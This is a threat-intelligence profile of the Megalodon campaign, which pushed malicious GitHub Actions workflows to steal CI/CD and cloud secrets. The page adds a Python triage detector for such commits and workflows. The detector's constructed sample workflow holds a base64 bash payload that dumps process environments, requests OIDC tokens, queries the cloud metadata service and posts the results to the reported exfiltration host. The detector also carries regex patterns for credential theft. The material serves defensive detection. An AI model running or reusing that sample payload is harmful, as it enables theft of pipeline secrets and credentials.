Mallory

Megalodon

Also known as: Megalodon

Megalodon is an automated software supply-chain campaign that targets GitHub repositories by pushing malicious commits which add GitHub Actions workflows built to steal CI/CD secrets and cloud credentials. Researchers reported 5,718 malicious commits affecting 5,561 repositories within a roughly six-hour window on 2026-05-18. The commits used forged CI-style identities such as build-bot, auto-ci, ci-bot and pipeline-bot, fake bot-like email addresses, and routine-looking commit messages. SafeDep assessed that the commits were most likely pushed with compromised personal access tokens or deploy keys, often directly to master without a pull request.

The injected workflows carried base64-encoded bash payloads; at least two variants, SysDiag and Optimize-Build, were observed. The payload runs inside the repository's CI/CD pipeline once the poisoned commit is on a branch the workflow triggers on, for example if a maintainer merges it. Reported collection targets include:

  • CI environment variables, /proc/*/environ and the environment of PID 1
  • AWS secret keys, Google Cloud access tokens, and credentials obtained from the AWS, GCP and Azure metadata services
  • SSH private keys, Docker and Kubernetes configurations, Vault tokens and Terraform credentials
  • shell history
  • GitHub tokens, GitHub Actions OIDC token request URLs and tokens, GitLab CI/CD tokens and Bitbucket tokens
  • .env files, credentials.json and service-account.json
  • secrets in source code, matched with more than 30 regex patterns

Exfiltration to 216.126.225[.]129:8443 was reported.

The campaign compromised public repositories including Tiledesk, where the attackers backdoored the GitHub repository rather than the npm account; the maintainer then unknowingly published poisoned package versions 2.18.6 through 2.18.12, with 2.18.5 identified as the last clean version. Reported affected repository groups also included Black-Iron-Project and WISE-Community repositories.
CISA described Megalodon as a separate campaign that injected malicious GitHub Actions workflows to harvest CI/CD secrets and cloud credentials from public repositories. Multiple sources noted similarities to TeamPCP and Mini Shai-Hulud tradecraft, but Ox Security stated that it found no direct threat-intelligence or code-analysis evidence linking Megalodon to TeamPCP and assessed it as likely a different threat actor imitating TeamPCP's behaviour and style. No additional aliases or sub-groups were identified in the source reporting.
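The profile above lists what the reported payloads collect and how the commits were pushed, which is enough to write a first-pass triage check. The following is an added example, not code from Mallory or from SafeDep, CISA or Ox Security: it decodes base64 blobs embedded in workflow `run:` steps and matches the decoded text against indicators written from the reported collection targets and the reported exfiltration endpoint, and it flags commit metadata matching the reported push pattern (forged CI-style identity, workflow file touched, no pull request). The sample workflow and commit metadata are constructed, the workflow file name and severity thresholds are hypothetical, and the regex list is a triage aid rather than a complete detection rule.

```python
# Added triage example for the reported Megalodon tradecraft. Not vendor code;
# indicators come from the collection targets and exfil endpoint reported above,
# sample inputs are constructed, and the severity buckets are a hypothetical heuristic.
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

# Forged CI-style committer identities reported in the campaign.
BOT_NAMES = {"build-bot", "auto-ci", "ci-bot", "pipeline-bot"}

# Strings the reported collection behaviour would touch; the IP is the reported exfil host.
INDICATORS = {
    "decode_and_exec": re.compile(r"base64\s+(?:-d|--decode)\b[^\n|]*\|\s*(?:ba)?sh\b"),
    "proc_environ": re.compile(r"/proc/\S*environ"),
    "oidc_token_request": re.compile(r"ACTIONS_ID_TOKEN_REQUEST_(?:URL|TOKEN)"),
    "cloud_metadata": re.compile(r"169\.254\.169\.254|metadata\.google\.internal"),
    "credential_files": re.compile(
        r"\.env\b|credentials\.json|service-account\.json|\.ssh/id_|\.kube/config|\.docker/config\.json"
    ),
    "reported_exfil_endpoint": re.compile(r"216\.126\.225\.129(?::8443)?"),
}
# Candidate base64 blobs: long runs of the base64 alphabet not preceded by more of it.
B64_BLOB = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{40,}={0,2}")


def decode_blobs(text: str) -> list[str]:
    """Return base64 blobs that decode to readable text, i.e. likely embedded scripts.
    Pinned action SHAs are also 40-char alphabet runs but decode to invalid UTF-8 and are dropped."""
    found = []
    for m in B64_BLOB.finditer(text):
        blob = m.group(0)
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            decoded = raw.decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        printable = sum(c.isprintable() or c in "\n\t" for c in decoded)
        if decoded and printable / len(decoded) > 0.9:
            found.append(decoded)
    return found


def scan_workflow(yaml_text: str) -> dict[str, list[str]]:
    """Map each indicator hit to the layers it appeared in: 'plain' and/or 'decoded'."""
    hits: dict[str, list[str]] = {}
    layers = [("plain", yaml_text)] + [("decoded", s) for s in decode_blobs(yaml_text)]
    for layer, content in layers:
        for name, rx in INDICATORS.items():
            if rx.search(content) and layer not in hits.setdefault(name, []):
                hits[name].append(layer)
    return hits


@dataclass
class Commit:
    author_name: str
    author_email: str
    message: str
    touched_paths: list[str]
    via_pull_request: bool


def scan_commit(c: Commit) -> list[str]:
    """Flag commit metadata matching the reported push pattern."""
    reasons = []
    if c.author_name.lower() in BOT_NAMES or c.author_email.split("@")[0].lower() in BOT_NAMES:
        reasons.append("reported_forged_identity")
    if any(p.startswith(".github/workflows/") for p in c.touched_paths):
        reasons.append("touches_workflow")
    if not c.via_pull_request:
        reasons.append("direct_push_no_pr")
    return reasons


def triage(commit: Commit, workflow_text: str) -> dict:
    """Combine both scans into a hypothetical severity bucket for review ordering."""
    reasons, hits = scan_commit(commit), scan_workflow(workflow_text)
    if "reported_exfil_endpoint" in hits or ("decode_and_exec" in hits and len(hits) >= 2):
        severity = "high"
    elif hits or "reported_forged_identity" in reasons:
        severity = "medium"
    else:
        severity = "none"
    return {"commit_reasons": reasons, "workflow_hits": hits, "severity": severity}


# Constructed samples resembling the reported tradecraft; not real artifacts.
_SAMPLE_SCRIPT = (
    "#!/bin/bash\n"
    "cat /proc/1/environ > /tmp/out\n"
    'curl -s -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL" >> /tmp/out\n'
    "curl -s http://169.254.169.254/latest/meta-data/ >> /tmp/out\n"
    "curl -s -X POST --data-binary @/tmp/out https://216.126.225.129:8443/\n"
)
_BLOB = base64.b64encode(_SAMPLE_SCRIPT.encode()).decode()
SAMPLE_MALICIOUS = f"""name: SysDiag
on: [push]
jobs:
  diag:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0
      - run: echo {_BLOB} | base64 -d | bash
"""
SAMPLE_CLEAN = """name: CI
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0
      - run: make test
"""
SAMPLE_COMMIT = Commit("build-bot", "build-bot@example.com", "chore: update build config",
                       [".github/workflows/sysdiag.yml"], via_pull_request=False)
CLEAN_COMMIT = Commit("Jane Maintainer", "jane@example.com", "fix: null check",
                      ["src/app.py"], via_pull_request=True)

if __name__ == "__main__":
    print("malicious:", triage(SAMPLE_COMMIT, SAMPLE_MALICIOUS))
    print("clean:", triage(CLEAN_COMMIT, SAMPLE_CLEAN))
```

Running the block prints a "high" verdict for the constructed SysDiag-style workflow (the decode-and-execute step is visible in plain text, while the /proc environ read, the OIDC token request variables, the metadata-service address and the reported exfil endpoint only surface after decoding) and "none" for the clean workflow. In practice the commit metadata would come from `git log` or the GitHub API, and the `direct_push_no_pr` reason is intentionally not enough on its own to raise severity, since many repositories push to their default branch routinely.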


OPERATIONAL PROFILE

Targeting

Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.

Who they target

Sectors the actor has been observed targeting.

  • Software & Services
MITRE ATT&CK

Tradecraft

17 distinct techniques observed across reporting (22 technique entries across 8 of the 15 ATT&CK tactics), grouped by tactic. ×N is the number of intelligence reports citing that technique; sub-techniques are listed under their parent.

TA0001 Initial Access (3 techniques)
  T1078      Valid Accounts                                          ×3
  T1133      External Remote Services
  T1195      Supply Chain Compromise                                 ×3
  T1195.001  Compromise Software Dependencies and Development Tools  ×2
  T1195.002  Compromise Software Supply Chain

TA0002 Execution (1 technique)
  T1059      Command and Scripting Interpreter
  T1059.004  Unix Shell

TA0003 Persistence (3 techniques)
  T1078      Valid Accounts                                          ×3
  T1133      External Remote Services
  T1546      Event Triggered Execution                               ×2

TA0004 Privilege Escalation (2 techniques)
  T1078      Valid Accounts                                          ×3
  T1546      Event Triggered Execution                               ×2

TA0005 Defense Evasion (3 techniques)
  T1027      Obfuscated Files or Information                         ×2
  T1036      Masquerading                                            ×2
  T1078      Valid Accounts                                          ×3

TA0006 Credential Access (2 techniques)
  T1552      Unsecured Credentials                                   ×3
  T1552.001  Credentials In Files                                    ×2
  T1552.004  Private Keys
  T1552.005  Cloud Instance Metadata API
  T1649      Steal or Forge Authentication Certificates              ×2

TA0009 Collection (1 technique)
  T1119      Automated Collection

TA0010 Exfiltration (1 technique)
  T1041      Exfiltration Over C2 Channel                            ×2